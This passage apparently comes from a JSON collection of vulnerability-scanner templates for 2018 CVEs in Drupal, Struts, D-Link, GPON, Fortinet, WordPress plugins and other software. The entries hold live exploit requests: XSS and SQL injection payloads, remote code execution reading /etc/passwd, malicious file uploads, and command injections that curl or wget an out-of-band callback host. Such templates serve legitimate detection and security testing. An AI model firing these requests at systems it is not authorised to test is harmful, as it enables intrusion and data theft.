/cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-10735","info":{"name":"NagiosXI <= 5.4.12 `commandline.php` SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://oast.me'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"header","words":["Server: mini_httpd"],"internal":true}]},{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["JSmol2WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-7314","info":{"name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16341","info":{"name":"Nuxeo <10.3 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"],"matchers":[{"type":"word","part":"body","words":["31333333337"]}]}]},{"id":"CVE-2018-13380","info":{"name":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B","{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1337)>","<script>alert(1337)</script>"],"condition":"or"},{"type":"word","part":"header","negative":true,"words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCodes 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10942","info":{"name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /modules/{{paths}}/file_upload.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n--ba1f796d0aa2482e9c51c81ae6087818\nContent-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\nContent-Type: multipart/form-data\n\n{{randstr}}\n--ba1f796d0aa2482e9c51c81ae6087818--\n","GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"paths":["attributewizardpro","1attributewizardpro","attributewizardpro.OLD","attributewizardpro_x"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{{filename}}"]},{"type":"word","part":"body_2","words":["{{randstr}}"]}],"extractors":[{"type":"regex","name":"file","part":"body_1","internal":true,"group":1,"regex":["(.*?)\\|\\|\\|\\|"]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory 